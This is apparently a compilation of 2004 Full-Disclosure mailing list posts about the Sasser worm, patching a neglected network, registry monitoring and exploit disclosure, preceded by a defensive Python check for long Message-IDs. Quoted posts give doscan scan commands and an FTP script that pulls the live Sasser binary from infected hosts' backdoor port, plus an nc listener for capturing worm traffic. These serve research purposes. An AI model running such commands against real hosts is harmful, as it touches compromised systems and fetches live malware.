|Regards, |Helmut Schmitz ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
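A defender-side check for the pattern Helmut describes, added here as an example (not his Perl test and not any Exchange code): parse a message and flag it when its Message-ID is longer than the 189 bytes he mentions and it is addressed to more than one recipient. The 189-byte threshold, the sample addresses and the sample messages are constructed assumptions.

```python
from email import message_from_string
from email.utils import getaddresses

# Assumption: the post says "189 bytes?", so that is the default limit.
MAX_MSGID_BYTES = 189


def recipient_count(msg):
    """Distinct addresses across To and Cc; the bug needs more than one."""
    pairs = getaddresses(msg.get_all("To", []) + msg.get_all("Cc", []))
    return len({addr.lower() for _, addr in pairs if addr})


def check_message(raw, max_msgid_bytes=MAX_MSGID_BYTES):
    """Flag a message whose Message-ID exceeds the limit and which is
    addressed to more than one recipient (the combination the post says
    makes Exchange deliver only one copy). Returns the measured values."""
    msg = message_from_string(raw)
    # Unfold the header: the Perl test wraps the ID across several lines,
    # and a Message-ID never contains legitimate whitespace.
    msgid = "".join(msg.get("Message-ID", "").split())
    length = len(msgid.encode("utf-8"))
    rcpts = recipient_count(msg)
    return {
        "message_id_bytes": length,
        "recipients": rcpts,
        "flagged": length > max_msgid_bytes and rcpts > 1,
    }


def build_sample(msgid_value, cc=True):
    """Constructed raw message in the shape of the Perl test above."""
    headers = ["From: sender@example.com", "To: alice@example.com"]
    if cc:
        headers.append("Cc: bob@example.com")
    headers.append("Message-ID: " + msgid_value)
    return "\r\n".join(headers) + "\r\n\r\nHallo\r\n"


# Constructed inputs: a long, folded ID like the Perl test, and a normal one.
LONG_ID = "<" + "x" * 100 + "\r\n " + "x" * 120 + "@example.com>"
SHORT_ID = "<abc123@example.com>"

if __name__ == "__main__":
    print(check_message(build_sample(LONG_ID)))   # flagged
    print(check_message(build_sample(SHORT_ID)))  # not flagged
```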
[Full-Disclosure] Registry Watcher
Hi,

Any programs out there that watch changes to the registry and can give an alert? My intention for this is only because of my limited knowledge of the Windows registry. As I understand, no processes, applications or programs run without entries in the registry. This it seems includes virus and Trojan installations. There are the common entries that belong in the registry that the common installation inserts, and all programs have values that must be inserted. If a watcher would have a database to follow, any odd or uncommon entries could be flagged. As far as I know all newly found viruses insert registry entries, and these could be placed in a database that would cause the registry to deny and flag. Wouldn't this in a sense be a firewall and virus protection method, or am I really off base in my understanding? I know that such use is used by AdWatch and other types of tools, but I have never seen anything mentioned for protection against backdoors, Trojans and viruses. If such a program does not exist I'd appreciate any input on building one.

thank you
Randall M
[Full-Disclosure] RE: Full-Disclosure digest, Catching Sasser
Hot damn, can't wait to get to work and try this on our network!

|--__--__--
|
|Message: 19
|From: Shashank Rai [EMAIL PROTECTED]
|Reply-To: [EMAIL PROTECTED]
|To: [EMAIL PROTECTED]
|Organization: Etisalat NIS
|Date: Tue, 04 May 2004 11:40:12 +0400
|Subject: [Full-Disclosure] Catching Sasser
|
|Hi all,
|for people who did not have the privilege of getting infected with
|sasser ;) because of firewall/AV/patch or they are smart enough to use
|Linux (like me hey now no flame war on this *please*), here is a
|simple way to catch sasser:
|
|Step 1: Scanning for infected machines (from a Linux box):
|-
|Get doscan from: http://www.enyo.de/fw/software/doscan/
|
|compile n run:
|# doscan -A 50 -b 512 -c 100 -i -p 5554 -P tcp -r "200 OK$" -v <IP RANGE>
|
|This will give you a list of infected machines.
|
|Step Two: Getting the virus
|---
|Copy the following set of commands into a file (or type them from ftp
|prompt):
|-ftp_commands--
|open <infected m/c IP> 5554
|anonymous
|user
|bin
|get 7584_up.exe
|bye
|--
|then from cmd prompt of your *windows* machine, run:
|
|c:\> ftp -s:ftp_commands
|
|This will fetch you a copy of the virus as 7584_up.exe.
|The ftp_commands file actually logs into the ftp server of sasser on port
|5554 of the infected machine with username anonymous and password
|user, and then issues a PORT command to download the virus.
|
|
|PS: USE THIS SET OF INSTRUCTIONS AT YOUR OWN RISK. BY EXECUTING THE
|DOWNLOADED FILE YOU WILL INFECT YOUR SYSTEM.
|
|In case you are running any AV with real-time protection features, it
|should immediately detect the virus!!!
|
|cheers,
|--
|Shashank Rai
|
|Network and Information Security Team,
|Emirates Telecommunication Corporation,
|Abu Dhabi, U.A.E.
|Ph: +971-2-6182523 Office
|+971-50-6670648 Cell
|GPG key:
|http://pgp.cns.ualberta.ca:11371/pks/lookup?op=vindex&search=0x01B79474026E36F5
[Full-Disclosure] RE: Full-Disclosure YOU know what blows me away.
You know what blows me away. People who can in one breath write the info like Youssef below and what others on this list have written. And that most of you are probably not older than 25 yrs old. You hacked your first box when you were 2 and flunked kindergarten class because your teacher didn't know C. Man, if I could get this list to write a book, what a treasure it would be. I play CounterStrike on hacking servers and it blows me away that some of these 14 yr olds are writing in C+ to code their own hacks. You know what I did when I was 14? I don't. G.I. Joes humping my sister's Barbies, I guess.

|--__--__--
|
|Message: 14
|Date: Mon, 3 May 2004 17:58:04 +0200 (CEST)
|From: youssef ALAOUI [EMAIL PROTECTED]
|To: [EMAIL PROTECTED]
|Subject: [Full-Disclosure] Unpacking Sasser
|
|HI,
|
|You can use PEiD to try to unpack Sasser (http://peid.has.it/)
|
|you can also catch this worm by creating a shell script called catch.sh
|
|catch.sh would contain two lines :
|
|nc -l -p 445 > ~/catched.dump$$
|./catch.sh
|
|then you just have to launch it : ./catch.sh
|
|that will create files with random names for each incoming connection to
|port 445 containing a dump of the traffic in your home directory.
|
|Tek Rulez
|
|
|ALAOUI ABDELLAOUI Youssef alias ANALYSTE
|Class of 2008 delegate
|-{Epitech}- European Institute of Technology
[Full-Disclosure] RE: Full-Disclosure digest, new LSASS - Javier
Javier,

Boy, are you hitting the head on the nail. There I was getting ready to patch all the machines I could that day (I had posted here about getting help in that direction: a man's gotta patch) and while I had a CD in my hand getting ready to insert it, up popped the LSASS Vulnerability error and restart in 60 seconds! Well, I shut it down, booted with no network and patched, and everything came out OK. Whew!

|--__--__--
|
|Message: 4
|Date: Mon, 03 May 2004 10:45:35 +0200
|From: Javier Fernandez-Sanguino [EMAIL PROTECTED]
|Organization: Germinus
|To: Ben Ryan [EMAIL PROTECTED]
|CC: [EMAIL PROTECTED], [EMAIL PROTECTED],
| [EMAIL PROTECTED]
|Subject: [Full-Disclosure] Re: New LSASS-based worm finally here (Sasser)
|
|Ben Ryan wrote:
|
|> As expected, LSASS exploit-based worm seems to have arrived. Fasten your
|> seatbelts, those unpatched please use the spew bags provided :)
|> I hope PSS resolves the issues discussed in KB835732.
|
|What's more disturbing is that this worm has established a new record
|for Microsoft worms [1]. Blaster was the fastest worm (25 days since
|the patch was published to the worm), this one has been even faster
|(17 days for the first variant since the patch was published to the
|worm). Of course, I'm not considering the fact that this issue was
|known, at least to eEye and Microsoft, for over 5 months.
|
|Regards
|
|Javier
|
|[1] Approaching the record of worms in other OS, which, I believe, is
|held by Scalper (10 days from patch to worm). But hey, they could
|browse the source changes for that one.
[Full-Disclosure] [ Full-Disclosure] A mans got to patch
thank you
Randall M

To my mentors:

Let me first give a short history of my situation. I work for a company that began 10 yrs ago with three Mac servers and about 25 Mac workstations. 10 years later they have 34 servers, 345 PC workstations and 60 G4/G5 Macs in 5 locations around the USA. I have been in the IT area for one and a half years. I have worked for this company for one year. Patching was not done as needed due to the growth and continuous requirements put on the two techs. For the last three days I have seen what I believe to be Agobot exploits (searching on names found in the registry, they were said to be associated with such). I have been reading this list for about three weeks now. I have become more aware of dangers that await. Frankly I'm scared to death :)

I want to begin the tedious task of patching the servers and workstations and can think of no better place than here to get some of what I feel would be very expert advice on doing this in the best fashion.

Our current environment: Moved to an AD Domain this year. Have yet a mixed member server environment with some of the NTs still with Explorer 5.5 (I can hear some here thinking "give me your IP!" :) ). I have gone through some of the servers with Microsoft security scanner and with some I simply went to the update area. Many had never visited there before, as the initial visit loads the scanner engine. The weakness here is the norm for the workstations also. We do tape backups nightly. Some of our main problems are the programs that are still used can't be repaired easily, such as Dynamics. Also some servers are running programs that we could never place back on because they had to be sent off to be loaded by the experts of the software companies. Another example is the web server, which is hanging on by a thread. They paid nearly $175,000 8 years ago for their online presence. That is no longer supported and we don't know a damn thing about it except to keep it going! So here you see my need.

My guess is that I have to know something of the risks with certain patches so as not to get myself in trouble losing sensitive material and such, not to mention my job for pushing for this to be done. I don't see this as a simple visit to Windows Update. Your advice would be greatly appreciated. I don't mind saying I'm scared to death.

Randall M
Re: [Full-Disclosure] no more public exploits: just a n00bie view
Hey, I have to agree with Borg. I am of course new to your list. I joined it to learn the what, when and where of security. I must say that when I saw exploits posted I was a bit taken aback. My first thought was "Guess I can expect to see it soon." A question naturally comes: would it show in the wild had it not been posted? And what percentage of exploits do go in the wild due to being posted along with the advisory? Then again, how can I be concerned about an advisory if I can't see the effects of the exploit? Of course, then again, I really have understood little about the code of the exploit but did a lot on the advisory. Just a n00bie view.

Borg wrote:

Message: 28
Date: Tue, 27 Apr 2004 13:19:44 -0400
From: chris [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] no more public exploits

Here's my two cents :-/

Exploit code is better kept private. Advisories should be public. Why? Because exploit code is not easy to write depending on the bug. And I for one sure don't want some 'penetration tester' taking my code and plugging it into his automated scanner and collecting the cash. I'm far too greedy to watch that happen. Sorry.

NON-Disclosure of Exploit code. Full-Disclosure of Advisories.

As far as the discussion of sysadmins patching on time or not. All I will say is this . . . if they did patch on time there wouldn't be a www.zone-h.org.

- borg (ChrisR-)

--__--__--

Borg ended.
[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1605 - 14 msgs
Asking for suggestions on best methods, equipment and experience to set up a test lab. I am more than anxious to learn and build my experience.

thank you
Randall M
[Full-Disclosure] RE: Full-Disclosure Super Worm
thank you
Randall M

William,

My job is to support the sales force using laptops. Also customer service reps. That silly scanning gets in the way and slows progress! Not only have they not learned, but don't care! I pull my hair out trying to come up with ways to support them and protect the network. Any advice welcomed.

Randall M.

--__--__--

Message: 8
Date: Sun, 18 Apr 2004 09:33:38 -0400
From: William Warren [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Super Worm

I bet most have not learned from Blaster. Sure a number of users may have gotten protected but I bet a majority are not.